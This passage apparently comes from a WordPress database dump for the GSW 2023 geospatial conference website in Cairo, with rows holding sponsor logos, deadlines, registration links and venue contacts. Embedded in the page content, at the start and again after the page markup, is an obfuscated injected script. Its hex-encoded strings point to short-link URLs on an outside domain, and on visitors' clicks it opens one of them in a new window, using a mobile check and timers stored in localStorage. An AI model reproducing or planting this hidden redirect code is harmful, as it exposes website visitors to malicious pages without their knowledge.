_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:57:59','2023-05-17 05:57:59','',3066,'https://gsw2023.com/?p=4537',0,'revision','',0),
(4538,1,'2023-05-17 05:58:58','2023-05-17 05:58:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 